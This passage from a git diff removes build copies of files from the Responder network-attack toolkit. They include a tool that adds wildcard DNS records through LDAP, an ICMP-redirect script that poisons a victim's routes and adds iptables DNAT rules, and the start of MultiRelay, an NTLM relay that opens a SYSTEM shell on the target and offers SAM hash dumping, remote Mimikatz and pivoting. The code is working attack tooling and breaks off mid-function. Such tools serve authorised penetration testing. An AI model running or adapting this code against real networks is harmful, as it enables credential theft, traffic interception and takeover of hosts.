BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
sys.path.insert(0, BASEDIR)
from Responder.servers.Browser import WorkstationFingerPrint, RequestType, RAPThisDomain, RapFinger
from socketserver import UDPServer, ThreadingMixIn, BaseRequestHandler
from threading import Lock
from Responder.utils import *
def ParseRoles(data):
if len(data) != 4:
return ''
AllRoles = {
'Workstation': (ord(data[0]) >> 0) & 1,
'Server': (ord(data[0]) >> 1) & 1,
'SQL': (ord(data[0]) >> 2) & 1,
'Domain Controller': (ord(data[0]) >> 3) & 1,
'Backup Controller': (ord(data[0]) >> 4) & 1,
'Time Source': (ord(data[0]) >> 5) & 1,
'Apple': (ord(data[0]) >> 6) & 1,
'Novell': (ord(data[0]) >> 7) & 1,
'Member': (ord(data[1]) >> 0) & 1,
'Print': (ord(data[1]) >> 1) & 1,
'Dialin': (ord(data[1]) >> 2) & 1,
'Xenix': (ord(data[1]) >> 3) & 1,
'NT Workstation': (ord(data[1]) >> 4) & 1,
'WfW': (ord(data[1]) >> 5) & 1,
'Unused': (ord(data[1]) >> 6) & 1,
'NT Server': (ord(data[1]) >> 7) & 1,
'Potential Browser': (ord(data[2]) >> 0) & 1,
'Backup Browser': (ord(data[2]) >> 1) & 1,
'Master Browser': (ord(data[2]) >> 2) & 1,
'Domain Master Browser': (ord(data[2]) >> 3) & 1,
'OSF': (ord(data[2]) >> 4) & 1,
'VMS': (ord(data[2]) >> 5) & 1,
'Windows 95+': (ord(data[2]) >> 6) & 1,
'DFS': (ord(data[2]) >> 7) & 1,
'Local': (ord(data[3]) >> 6) & 1,
'Domain Enum': (ord(data[3]) >> 7) & 1,
}
return ', '.join(k for k,v in list(AllRoles.items()) if v == 1)
class BrowserListener(BaseRequestHandler):
def handle(self):
data, socket = self.request
lock = Lock()
lock.acquire()
DataOffset = struct.unpack('<H',data[139:141])[0]
BrowserPacket = data[82+DataOffset:]
ReqType = RequestType(BrowserPacket[0])
Domain = Decode_Name(data[49:81])
Name = Decode_Name(data[15:47])
Role1 = NBT_NS_Role(data[45:48])
Role2 = NBT_NS_Role(data[79:82])
Fprint = WorkstationFingerPrint(data[190:192])
Roles = ParseRoles(data[192:196])
print(text("[BROWSER] Request Type : %s" % ReqType))
print(text("[BROWSER] Address : %s" % self.client_address[0]))
print(text("[BROWSER] Domain : %s" % Domain))
print(text("[BROWSER] Name : %s" % Name))
print(text("[BROWSER] Main Role : %s" % Role1))
print(text("[BROWSER] 2nd Role : %s" % Role2))
print(text("[BROWSER] Fingerprint : %s" % Fprint))
print(text("[BROWSER] Role List : %s" % Roles))
RAPThisDomain(self.client_address[0], Domain)
lock.release()
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
def server_bind(self):
self.allow_reuse_address = 1
UDPServer.server_bind(self)
def serve_thread_udp_broadcast(host, port, handler):
try:
server = ThreadingUDPServer(('', port), handler)
server.serve_forever()
except:
print("Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")
if __name__ == "__main__":
try:
print("Listening for BROWSER datagrams...")
_thread.start_new(serve_thread_udp_broadcast,('', 138, BrowserListener))
while True:
time.sleep(1)
except KeyboardInterrupt:
sys.exit("\r Exiting...")

185
build/lib/Responder/tools/DNSUpdate.py
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@ -1,185 +0,0 @@
#!/usr/bin/env python
import sys
import argparse
import getpass
import re
import socket
from impacket.structure import Structure
import ldap3
import dns.resolver
from collections import defaultdict
class DNS_RECORD(Structure):
"""
dnsRecord - used in LDAP [MS-DNSP] section 2.3.2.2
impacket based structure, all of the below are tuples in format (fieldName, format)
"""
structure = (
('DataLength', '<H-Data'),
('Type', '<H'),
('Version', 'B=5'),
('Rank', 'B'),
('Flags', '<H=0'),
('Serial', '<L'),
('TtlSeconds', '>L'),
('Reserved', '<L=0'),
('TimeStamp', '<L=0'),
('Data', ':')
)
class DNS_RPC_RECORD_A(Structure):
"""
DNS_RPC_RECORD_A [MS-DNSP] section 2.2.2.2.4.1
impacket based structure, all of the below are tuples in format (fieldName, format)
"""
structure = (
('address', ':'),
)
class DNS_RPC_RECORD_TS(Structure):
"""
DNS_RPC_RECORD_TS [MS-DNSP] section 2.2.2.2.4.23
impacket based structure, all of the below are tuples in format (fieldName, format)
"""
structure = (
('entombedTime', '<Q'),
)
def getserial(server, zone):
dnsresolver = dns.resolver.Resolver()
try:
socket.inet_aton(server)
dnsresolver.nameservers = [server]
except socket.error:
pass
res = dnsresolver.query(zone, 'SOA')
for answer in res:
return answer.serial + 1
def new_A_record(type, serial):
nr = DNS_RECORD()
nr['Type'] = type
nr['Serial'] = serial
nr['TtlSeconds'] = 180
nr['Rank'] = 240
return nr
ddict1 = defaultdict(list)
parser = argparse.ArgumentParser(description='Add/ Remove DNS records for an effective pawning with responder')
parser.add_argument("-DNS", type=str,help="IP address of the DNS server/ Domain Controller to connect to")
parser.add_argument("-u","--user",type=str,help="Domain\\Username for authentication.")
parser.add_argument("-p","--password",type=str,help="Password or LM:NTLM hash, will prompt if not specified")
parser.add_argument("-a", "--action", type=str, help="ad, rm, or an: add, remove, analyze")
parser.add_argument("-r", "--record", type=str, help="DNS record name")
parser.add_argument("-d", "--data", help="The IP address of attacker machine")
parser.add_argument("-l", "--logfile", type=str, help="The log file of Responder in analyze mode")
args = parser.parse_args()
#Checking Username and Password
if args.user is not None:
if not '\\' in args.user:
print('Username must include a domain, use: Domain\\username')
sys.exit(1)
if args.password is None:
args.password = getpass.getpass()
#Check the required arguments
if args.action in ['ad', 'rm']:
if args.action == 'ad' and not args.record:
flag = input("No record provided, Enter 'Y' to add a Wildcard record: ")
if flag.lower() == 'y' or flag.lower() == 'yes':
recordname = "*"
else:
sys.exit(1)
else:
recordname = args.record
if args.action == 'ad' and not args.data:
print("Provide an IP address with argument -d")
sys.exit(1)
if args.action == "rm" and not args.record:
print("No record provided to be deleted")
elif args.action == "an":
if args.logfile:
with open(args.logfile) as infile:
for lline in infile:
templist = lline.split(":")
tempIP = templist[2].split( )[0]
tempRecord = templist[3].split( )[0]
ddict1[tempRecord].append(tempIP)
infile.close()
for k,v in ddict1.items():
print("The request %s was made by %s hosts" % (k, len(set(v))))
sys.exit(0)
else:
print("Provide a log file from responder session in analyze mode")
sys.exit(1)
else:
print("Choose one of the three actions")
sys.exit(1)
#inital connection
dnserver = ldap3.Server(args.DNS, get_info=ldap3.ALL)
print('Connecting to host...')
con = ldap3.Connection(dnserver, user=args.user, password=args.password, authentication=ldap3.NTLM)
print('Binding to host')
# Binding with the user context
if not con.bind():
print('Bind failed, Check the Username and Password')
print(con.result)
sys.exit(1)
print('Bind OK')
#Configure DN for the record, gather domainroot, dnsroot, zone
domainroot = dnserver.info.other['defaultNamingContext'][0]
dnsroot = 'CN=MicrosoftDNS,DC=DomainDnsZones,%s' % domainroot
zone = re.sub(',DC=', '.', domainroot[domainroot.find('DC='):], flags=re.I)[3:]
if recordname.lower().endswith(zone.lower()):
recordname = recordname[:-(len(zone)+1)]
record_dn = 'DC=%s,DC=%s,%s' % (recordname, zone, dnsroot)
if args.action == 'ad':
record = new_A_record(1, getserial(args.DNS, zone))
record['Data'] = DNS_RPC_RECORD_A()
record['Data'] = socket.inet_aton(args.data)
#Adding the data to record object
recorddata = {
#'objectClass': ['top', 'dnsNode'],
'dNSTombstoned': False,
'name': recordname,
'dnsRecord': [record.getData()]
}
objectClass = ['top', 'dnsNode']
print('Adding the record')
con.add(record_dn, objectClass, recorddata)
#con.add(record_dn, ['top', 'dnsNode'], recorddata)
print(con.result)
elif args.action == 'rm':
#searching for the record
searchbase = 'DC=%s,%s' % (zone, dnsroot)
con.search(searchbase, '(&(objectClass=dnsNode)(name=%s))' % ldap3.utils.conv.escape_filter_chars(recordname), attributes=['dnsRecord','dNSTombstoned','name'])
if len(con.response) != 0:
for entry in con.response:
if entry['type'] != 'searchResEntry':
print("Provided record does not exists")
sys.exit(1)
else:
record_dn = entry['dn']
print(entry['raw_attributes']['dnsRecord'])
else:
print("Provided record does not exists")
con.delete(record_dn)
if con.result['description'] == "success":
print("Record deleted successfully")

38
build/lib/Responder/tools/FindSQLSrv.py
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@ -1,38 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from socket import *
print('MSSQL Server Finder 0.3')
s = socket(AF_INET,SOCK_DGRAM)
s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
s.settimeout(5)
s.sendto(b'\x02',('255.255.255.255',1434))
try:
while 1:
data, address = s.recvfrom(8092)
if not data:
break
else:
print("===============================================================")
print(("Host details: %s"%(address[0])))
print((data[2:]).decode('latin-1'))
print("===============================================================")
print("")
except:
pass

279
build/lib/Responder/tools/Icmp-Redirect.py
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@ -1,279 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
import struct
import optparse
import pipes
import sys
import codecs
from socket import *
sys.path.append('../')
from Responder.odict import OrderedDict
from random import randrange
from time import sleep
from subprocess import call
if (sys.version_info < (3, 0)):
sys.exit('This script is meant to be run with Python3')
parser = optparse.OptionParser(usage='python %prog -I eth0 -i 10.20.30.40 -g 10.20.30.254 -t 10.20.30.48 -r 10.20.40.1',
prog=sys.argv[0],
)
parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP")
parser.add_option('-g', '--gateway',action="store", help="The ip address of the original gateway (issue the command 'route -n' to know where is the gateway", metavar="10.20.30.254",dest="OriginalGwAddr")
parser.add_option('-t', '--target',action="store", help="The ip address of the target", metavar="10.20.30.48",dest="VictimIP")
parser.add_option('-r', '--route',action="store", help="The ip address of the destination target, example: DNS server. Must be on another subnet.", metavar="10.20.40.1",dest="ToThisHost")
parser.add_option('-s', '--secondaryroute',action="store", help="The ip address of the destination target, example: Secondary DNS server. Must be on another subnet.", metavar="10.20.40.1",dest="ToThisHost2")
parser.add_option('-I', '--interface',action="store", help="Interface name to use, example: eth0", metavar="eth0",dest="Interface")
parser.add_option('-a', '--alternate',action="store", help="The alternate gateway, set this option if you wish to redirect the victim traffic to another host than yours", metavar="10.20.30.40",dest="AlternateGwAddr")
options, args = parser.parse_args()
if options.OURIP is None:
print("-i mandatory option is missing.\n")
parser.print_help()
exit(-1)
elif options.OriginalGwAddr is None:
print("-g mandatory option is missing, please provide the original gateway address.\n")
parser.print_help()
exit(-1)
elif options.VictimIP is None:
print("-t mandatory option is missing, please provide a target.\n")
parser.print_help()
exit(-1)
elif options.Interface is None:
print("-I mandatory option is missing, please provide your network interface.\n")
parser.print_help()
exit(-1)
elif options.ToThisHost is None:
print("-r mandatory option is missing, please provide a destination target.\n")
parser.print_help()
exit(-1)
if options.AlternateGwAddr is None:
AlternateGwAddr = options.OURIP
#Setting some vars.
OURIP = options.OURIP
OriginalGwAddr = options.OriginalGwAddr
AlternateGwAddr = options.AlternateGwAddr
VictimIP = options.VictimIP
ToThisHost = options.ToThisHost
ToThisHost2 = options.ToThisHost2
Interface = options.Interface
def Show_Help(ExtraHelpData):
print("\nICMP Redirect Utility 0.1.\nCreated by Laurent Gaffie, please send bugs/comments to laurent.gaffie@gmail.com\n\nThis utility combined with Responder is useful when you're sitting on a Windows based network.\nMost Linux distributions discard by default ICMP Redirects.\n")
print(ExtraHelpData)
MoreHelp = "Note that if the target is Windows, the poisoning will only last for 10mn, you can re-poison the target by launching this utility again\nIf you wish to respond to the traffic, for example DNS queries your target issues, launch this command as root:\n\niptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst %s --dport 53 -j DNAT --to-destination %s:53\n\n"%(ToThisHost,OURIP)
#Python version
if (sys.version_info > (3, 0)):
PY2OR3 = "PY3"
else:
PY2OR3 = "PY2"
def StructWithLenPython2or3(endian,data):
#Python2...
if PY2OR3 == "PY2":
return struct.pack(endian, data)
#Python3...
else:
return struct.pack(endian, data).decode('latin-1')
def NetworkSendBufferPython2or3(data):
if PY2OR3 == "PY2":
return str(data)
else:
return bytes(str(data), 'latin-1')
def NetworkRecvBufferPython2or3(data):
if PY2OR3 == "PY2":
return str(data)
else:
return str(data.decode('latin-1'))
def GenCheckSum(data):
s = 0
for i in range(0, len(data), 2):
q = ord(data[i]) + (ord(data[i+1]) << 8)
f = s + q
s = (f & 0xffff) + (f >> 16)
return StructWithLenPython2or3("<H",~s & 0xffff)
class Packet():
fields = OrderedDict([
("data", ""),
])
def __init__(self, **kw):
self.fields = OrderedDict(self.__class__.fields)
for k,v in kw.items():
if callable(v):
self.fields[k] = v(self.fields[k])
else:
self.fields[k] = v
def __str__(self):
return "".join(map(str, self.fields.values()))
#####################################################################
#ARP Packets
#####################################################################
class EthARP(Packet):
fields = OrderedDict([
("DstMac", "\xff\xff\xff\xff\xff\xff"),
("SrcMac", ""),
("Type", "\x08\x06" ), #ARP
])
class ARPWhoHas(Packet):
fields = OrderedDict([
("HwType", "\x00\x01"),
("ProtoType", "\x08\x00" ), #IP
("MacLen", "\x06"),
("IPLen", "\x04"),
("OpCode", "\x00\x01"),
("SenderMac", ""),
("SenderIP", "\x00\xff\x53\x4d"),
("DstMac", "\x00\x00\x00\x00\x00\x00"),
("DstIP", "\x00\x00\x00\x00"),
])
def calculate(self):
self.fields["DstIP"] = inet_aton(self.fields["DstIP"]).decode('latin-1')
self.fields["SenderIP"] = inet_aton(OURIP).decode('latin-1')
#####################################################################
#ICMP Redirect Packets
#####################################################################
class Eth2(Packet):
fields = OrderedDict([
("DstMac", ""),
("SrcMac", ""),
("Type", "\x08\x00" ), #IP
])
class IPPacket(Packet):
fields = OrderedDict([
("VLen", "\x45"),
("DifField", "\x00"),
("Len", "\x00\x38"),
("TID", "\x25\x25"),
("Flag", "\x00"),
("FragOffset", "\x00"),
("TTL", "\x1d"),
("Cmd", "\x01"), #ICMP
("CheckSum", "\x00\x00"),
("SrcIP", ""),
("DestIP", ""),
("Data", ""),
])
def calculate(self):
self.fields["TID"] = chr(randrange(256))+chr(randrange(256))
self.fields["SrcIP"] = inet_aton(str(self.fields["SrcIP"])).decode('latin-1')
self.fields["DestIP"] = inet_aton(str(self.fields["DestIP"])).decode('latin-1')
# Calc Len First
CalculateLen = str(self.fields["VLen"])+str(self.fields["DifField"])+str(self.fields["Len"])+str(self.fields["TID"])+str(self.fields["Flag"])+str(self.fields["FragOffset"])+str(self.fields["TTL"])+str(self.fields["Cmd"])+str(self.fields["CheckSum"])+str(self.fields["SrcIP"])+str(self.fields["DestIP"])+str(self.fields["Data"])
self.fields["Len"] = StructWithLenPython2or3(">H", len(CalculateLen))
# Then CheckSum this packet
CheckSumCalc =str(self.fields["VLen"])+str(self.fields["DifField"])+str(self.fields["Len"])+str(self.fields["TID"])+str(self.fields["Flag"])+str(self.fields["FragOffset"])+str(self.fields["TTL"])+str(self.fields["Cmd"])+str(self.fields["CheckSum"])+str(self.fields["SrcIP"])+str(self.fields["DestIP"])
self.fields["CheckSum"] = GenCheckSum(CheckSumCalc)
class ICMPRedir(Packet):
fields = OrderedDict([
("Type", "\x05"),
("OpCode", "\x01"),
("CheckSum", "\x00\x00"),
("GwAddr", ""),
("Data", ""),
])
def calculate(self):
self.fields["GwAddr"] = inet_aton(OURIP).decode('latin-1')
CheckSumCalc =str(self.fields["Type"])+str(self.fields["OpCode"])+str(self.fields["CheckSum"])+str(self.fields["GwAddr"])+str(self.fields["Data"])
self.fields["CheckSum"] = GenCheckSum(CheckSumCalc)
class DummyUDP(Packet):
fields = OrderedDict([
("SrcPort", "\x00\x35"), #port 53
("DstPort", "\x00\x35"),
("Len", "\x00\x08"), #Always 8 in this case.
("CheckSum", "\x00\x00"), #CheckSum disabled.
])
def ReceiveArpFrame(DstAddr):
s = socket(AF_PACKET, SOCK_RAW)
s.settimeout(5)
Protocol = 0x0806
s.bind((Interface, Protocol))
OurMac = s.getsockname()[4].decode('latin-1')
Eth = EthARP(SrcMac=OurMac)
Arp = ARPWhoHas(DstIP=DstAddr,SenderMac=OurMac)
Arp.calculate()
final = str(Eth)+str(Arp)
try:
s.send(NetworkSendBufferPython2or3(final))
data = s.recv(1024)
DstMac = data[22:28]
DestMac = codecs.encode(DstMac, 'hex')
PrintMac = ":".join([DestMac[x:x+2].decode('latin-1') for x in range(0, len(DestMac), 2)])
return PrintMac,DstMac.decode('latin-1')
except:
print("[ARP]%s took too long to Respond. Please provide a valid host.\n"%(DstAddr))
exit(1)
def IcmpRedirectSock(DestinationIP):
PrintMac,DestMac = ReceiveArpFrame(VictimIP)
print('[ARP]Target Mac address is :',PrintMac)
PrintMac,RouterMac = ReceiveArpFrame(OriginalGwAddr)
print('[ARP]Router Mac address is :',PrintMac)
s = socket(AF_PACKET, SOCK_RAW)
Protocol = 0x0800
s.bind((Interface, Protocol))
Eth = Eth2(DstMac=DestMac,SrcMac=RouterMac)
IPPackUDP = IPPacket(Cmd="\x11",SrcIP=VictimIP,DestIP=DestinationIP,TTL="\x40",Data=str(DummyUDP()))
IPPackUDP.calculate()
ICMPPack = ICMPRedir(GwAddr=AlternateGwAddr,Data=str(IPPackUDP))
ICMPPack.calculate()
IPPack = IPPacket(SrcIP=OriginalGwAddr,DestIP=VictimIP,TTL="\x40",Data=str(ICMPPack))
IPPack.calculate()
final = str(Eth)+str(IPPack)
s.send(NetworkSendBufferPython2or3(final))
print('\n[ICMP]%s should have been poisoned with a new route for target: %s.\n'%(VictimIP,DestinationIP))
def FindWhatToDo(ToThisHost2):
if ToThisHost2 != None:
Show_Help('Hit CTRL-C to kill this script')
RunThisInLoop(ToThisHost, ToThisHost2,OURIP)
if ToThisHost2 == None:
Show_Help(MoreHelp)
IcmpRedirectSock(DestinationIP=ToThisHost)
exit()
def RunThisInLoop(host, host2, ip):
dns1 = pipes.quote(host)
dns2 = pipes.quote(host2)
ouripadd = pipes.quote(ip)
call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns1+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True)
call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns2+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True)
print("[+]Automatic mode enabled\nAn iptable rules has been added for both DNS servers.")
while True:
IcmpRedirectSock(DestinationIP=dns1)
IcmpRedirectSock(DestinationIP=dns2)
print("[+]Repoisoning the target in 8 minutes...")
sleep(480)
FindWhatToDo(ToThisHost2)

853
build/lib/Responder/tools/MultiRelay.py
View file

@ -1,853 +0,0 @@
#!/usr/bin/env python
# -*- coding: latin-1 -*-
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
if (sys.version_info > (3, 0)):
PY2OR3 = "PY3"
else:
PY2OR3 = "PY2"
sys.exit("For now MultiRelay only supports python 3. Try python3 MultiRelay.py ...")
import re
import os
import logging
import optparse
import time
import random
import subprocess
from threading import Thread
if PY2OR3 == "PY3":
from socketserver import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
else:
from SocketServer import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
try:
from Crypto.Hash import MD5
except ImportError:
print("\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes.")
print("You can install it on debian based os with this command: apt-get install python-crypto")
print("The Sam file will be saved anyway and you will have the bootkey.\033[0m\n")
try:
import readline
except:
print("Warning: readline module is not available, you will not be able to use the arrow keys for command history")
pass
from MultiRelay.RelayMultiPackets import *
from MultiRelay.RelayMultiCore import *
from SMBFinger.Finger import RunFinger,ShowSigning,RunPivotScan
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../')))
from socket import *
__version__ = "2.5"
MimikatzFilename = "./MultiRelay/bin/mimikatz.exe"
Mimikatzx86Filename = "./MultiRelay/bin/mimikatz_x86.exe"
RunAsFileName = "./MultiRelay/bin/Runas.exe"
SysSVCFileName = "./MultiRelay/bin/Syssvc.exe"
def color(txt, code = 1, modifier = 0):
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
if os.path.isfile(SysSVCFileName) is False:
print(color("[!]MultiRelay/bin/ folder is empty. You need to run these commands:\n",1,1))
print(color("apt-get install gcc-mingw-w64-x86-64",2,1))
print(color("x86_64-w64-mingw32-gcc ./MultiRelay/bin/Runas.c -o ./MultiRelay/bin/Runas.exe -municode -lwtsapi32 -luserenv",2,1))
print(color("x86_64-w64-mingw32-gcc ./MultiRelay/bin/Syssvc.c -o ./MultiRelay/bin/Syssvc.exe -municode",2,1))
print(color("\nAdditionally, you can add your custom mimikatz executables (mimikatz.exe and mimikatz_x86.exe)\nin the MultiRelay/bin/ folder for the mimi32/mimi command.",3,1))
sys.exit()
def UserCallBack(op, value, dmy, parser):
args=[]
for arg in parser.rargs:
if arg[0] != "-":
args.append(arg)
if arg[0] == "-":
break
if getattr(parser.values, op.dest):
args.extend(getattr(parser.values, op.dest))
setattr(parser.values, op.dest, args)
parser = optparse.OptionParser(usage="\npython %prog -t 10.20.30.40 -u Administrator lgandx admin\npython %prog -t 10.20.30.40 -u ALL", version=__version__, prog=sys.argv[0])
parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET")
parser.add_option('-p',action="store", help="Additional port to listen on, this will relay for proxy, http and webdav incoming packets.",metavar="8081",dest="ExtraPort")
parser.add_option('-u', '--UserToRelay', help="Users to relay. Use '-u ALL' to relay all users.", action="callback", callback=UserCallBack, dest="UserToRelay")
parser.add_option('-c', '--command', action="store", help="Single command to run (scripting)", metavar="whoami",dest="OneCommand")
parser.add_option('-d', '--dump', action="store_true", help="Dump hashes (scripting)", metavar="whoami",dest="Dump")
options, args = parser.parse_args()
if options.TARGET is None:
print("\n-t Mandatory option is missing, please provide a target.\n")
parser.print_help()
exit(-1)
if options.UserToRelay is None:
print("\n-u Mandatory option is missing, please provide a username to relay.\n")
parser.print_help()
exit(-1)
if options.ExtraPort is None:
options.ExtraPort = 0
if not os.geteuid() == 0:
print(color("[!] MultiRelay must be run as root."))
sys.exit(-1)
OneCommand = options.OneCommand
Dump = options.Dump
ExtraPort = options.ExtraPort
UserToRelay = options.UserToRelay
Host = [options.TARGET]
Cmd = []
ShellOpen = []
Pivoting = [2]
def ShowWelcome():
print(color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1))
print('\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com')
print('Usernames to relay (-u) are case sensitive.')
print('To kill this script hit CTRL-C.\n')
print(color('/*',8,1))
print('Use this script in combination with Responder.py for best results.')
print('Make sure to set SMB and HTTP to OFF in Responder.conf.\n')
print('This tool listen on TCP port 80, 3128 and 445.')
print('For optimal pwnage, launch Responder only with these 2 options:')
print('-rv\nAvoid running a command that will likely prompt for information like net use, etc.')
print('If you do so, use taskkill (as system) to kill the process.')
print(color('*/',8,1))
print(color('\nRelaying credentials for these users:',8,1))
print(color(UserToRelay,4,1))
print('\n')
ShowWelcome()
def ShowHelp():
print(color('Available commands:',8,0))
print(color('dump',8,1)+' -> Extract the SAM database and print hashes.')
print(color('regdump KEY',8,1)+' -> Dump an HKLM registry key (eg: regdump SYSTEM)')
print(color('read Path_To_File',8,1)+' -> Read a file (eg: read /windows/win.ini)')
print(color('get Path_To_File',8,1)+' -> Download a file (eg: get users/administrator/desktop/password.txt)')
print(color('delete Path_To_File',8,1)+'-> Delete a file (eg: delete /windows/temp/executable.exe)')
print(color('upload Path_To_File',8,1)+'-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \\windows\\temp\\')
print(color('runas Command',8,1)+' -> Run a command as the currently logged in user. (eg: runas whoami)')
print(color('scan /24',8,1)+' -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to')
print(color('pivot IP address',8,1)+' -> Connect to another host (eg: pivot 10.0.0.12)')
print(color('mimi command',8,1)+' -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)')
print(color('mimi32 command',8,1)+' -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)')
print(color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)')
print(color('help',8,1)+' -> Print this message.')
print(color('exit',8,1)+' -> Exit this shell and return in relay mode.')
print(' If you want to quit type exit and then use CTRL-C\n')
print(color('Any other command than that will be run as SYSTEM on the target.\n',8,1))
Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../"
Logs = logging
Logs.basicConfig(filemode="w",filename=Logs_Path+'logs/SMBRelay-Session.txt',level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
def NetworkSendBufferPython2or3(data):
if PY2OR3 == "PY2":
return str(data)
else:
return bytes(str(data), 'latin-1')
def NetworkRecvBufferPython2or3(data):
if PY2OR3 == "PY2":
return str(data)
else:
return str(data.decode('latin-1'))
def StructPython2or3(endian,data):
#Python2...
if PY2OR3 == "PY2":
return struct.pack(endian, len(data))
#Python3...
else:
return struct.pack(endian, len(data)).decode('latin-1')
def UploadContent(File):
with open(File,'rb') as f:
s = f.read()
FileLen = len(s.decode('latin-1'))
FileContent = s.decode('latin-1')
return FileLen, FileContent
try:
RunFinger(Host[0])
except:
raise
print("The host %s seems to be down or port 445 down."%(Host[0]))
sys.exit(1)
def get_command():
global Cmd
Cmd = []
while any(x in Cmd for x in Cmd) is False:
Cmd = [input("C:\\Windows\\system32\\:#")]
#Function used to make sure no connections are accepted while we have an open shell.
#Used to avoid any possible broken pipe.
def IsShellOpen():
#While there's nothing in our array return false.
if any(x in ShellOpen for x in ShellOpen) is False:
return False
#If there is return True.
else:
return True
#Function used to make sure no connections are accepted on HTTP and HTTP_Proxy while we are pivoting.
def IsPivotOn():
#While there's nothing in our array return false.
if Pivoting[0] == "2":
return False
#If there is return True.
if Pivoting[0] == "1":
print("pivot is on")
return True
def ConnectToTarget():
try:
s = socket(AF_INET, SOCK_STREAM)
s.connect((Host[0],445))
return s
except:
try:
sys.exit(1)
print("Cannot connect to target, host down?")
except:
pass
class HTTPProxyRelay(BaseRequestHandler):
def handle(self):
try:
#Don't handle requests while a shell is open. That's the goal after all.
if IsShellOpen():
return None
if IsPivotOn():
return None
except:
raise
s = ConnectToTarget()
try:
data = self.request.recv(8092)
##First we check if it's a Webdav OPTION request.
Webdav = ServeOPTIONS(data)
if Webdav:
#If it is, send the option answer, we'll send him to auth when we receive a profind.
self.request.send(Webdav)
data = self.request.recv(4096)
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
if NTLM_Auth:
#Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == "\x01":
## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
n = SMBNegoCairo(Data = SMBNegoCairoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
smbdata = s.recv(2048)
##Session Setup AndX Request, NTLMSSP_NEGOTIATE
if smbdata[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00")
t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(NetworkSendBufferPython2or3(buffer1))
smbdata = s.recv(2048) #got it here.
## Send HTTP Proxy
Buffer_Ans = WPAD_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
data = self.request.recv(8092)
NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
##Got NTLM Message 3 from client.
if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
##Might be anonymous, verify it and if so, send no go to client.
if IsSMBAnonymous(NTLM_Auth):
Response = WPAD_Auth_407_Ans()
self.request.send(str(Response))
